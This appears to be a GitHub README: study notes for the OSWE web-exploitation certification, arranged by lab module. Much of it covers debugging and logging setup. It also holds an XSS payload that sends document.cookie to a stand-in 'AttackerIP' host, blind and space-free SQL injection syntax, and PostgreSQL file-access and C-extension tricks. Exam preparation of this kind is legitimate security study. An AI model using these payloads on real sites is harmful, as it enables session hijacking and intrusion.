OSWE-cheat-sheet

OSWE-cheat sheet module by module short notes for quick revision for exam:

Module : Atmail (PHP):

Access and alert cookie (Httponly flag should be disable in set-Cookie headers)
<script>alert(document.cookie);</script>
Run Python Server in python3
python3 -m http.server
Embeded cookie steal payload in image tag
function addImage() {
var img = document.createElement('img');
img.src = 'http://AttackerIP:port/' + document.cookie;
document.body.appendChild(img);
}
addImage();
Set cookie in web developer console
javascript:void(document.cookie="cookiename=value");
XHR POST Request
xhr= new XMLHttpRequest()
xhr.open("POST", url, true)
xhr.send(data)
XHR GET Request
xhr= new XMLHttpRequest()
xhr.open("GET", url, true)
xhr.send()

Module : ATutor Authentication Bypass and RCE (PHP) :

Enable MySQL DB logging
nano /etc/mysql/my.cnf // uncomment or add below line
[mysqld]
general_log_file = /var/log/mysql/mysql.log
general_log = 1
systemctl restart mysql //Restart MySQL
tail –f /var/log/mysql/mysql.log //Access MySQL Log
Enable PHP verbose error
nano /etc/php5/apache2/php.ini //uncomment or add below line
#display_errors = On
systemctl restart apache2 //Restart Apache
Print statement in PHP
echo "any message";
Dump information about varaible
var_dump($var);
Serach for fiunction in code
grep -rnw "function name(" ./ --color
Check magic quote enable
var_dump(get_magic_quotes_gpc()); /** for enable value is 1 **/
MYSQL query without space
mysql> select/**/1;
Extract first character of MySql version in case of blind MySQL query
mysql> select ascii(substring((select version()),1,1))=53; /** use with "or" boolean **/
Create ZIp file using Python2
!/usr/bin/python
import zipfile
from cStringIO import StringIO

def build_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('folder/file.txt', 'secret')
z.close()
zip = open('zip.zip','wb')
print f.getvalue()
zip.write(f.getvalue())
zip.close()

build_zip()

Module : PHP Type Juggling Vulnerability :

Configure SMTP Server
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25 & /* & for run in background */

Module : ManageEngine Application Manager AMUserResourcesSyncServlet SQL(Postgres) Injection & RCE :

web.xml determine how URLs mapped
Tool JD-GUI use to decompile java
Find SQL injection vulnerability using below regular expression
^.?query.?select.*?
Enable postgres logging by uncommenting below line in postgresql.conf file
log_statement = 'all'
postgre cli psql -U username -p 15432 /* p=port, /
Alternative of single quote(') is duble doller sign($$)
decode string in postgres
select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
Using CHR and String Concatenation
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
Accessing the File System in postgres
COPY <table_name> from <file_name>
COPY <table_name> to <file_name>
PostgreSQL Extensions
CREATE OR REPLACE FUNCTION test(text) RETURNS void AS 'FILENAME', 'test' LANGUAGE 'C' STRICT;

Module : The Bassmaster Plugin (Nodejs) :

Module : DotNetNuke Cookie Deserialization RCE

XmlSerializer Limitations
XmlSerializer is only able to serialize public properties and fields of an object.
For better debugging experirence modify the debugging dll in dnSpy tool
[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | DebuggableAttribute.DebuggingModes.DisableOptimizations | DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | DebuggableAttribute.DebuggingModes.EnableEditAndContinue)]
XML Serialization & Deserialization method
XmlSerializer.serialize() and XmlSerializer.deserialize(reader)
Java Serialization & Deserialization method
Deserialization : inputObjectStream.readObject() and Serialization: outputObjectStream.writeObject()

Module : ERPNext Authentication Bypass and Server Side Template Injection :

Name		Name	Last commit message	Last commit date
Latest commit History 41 Commits
README.md		README.md

Provide feedback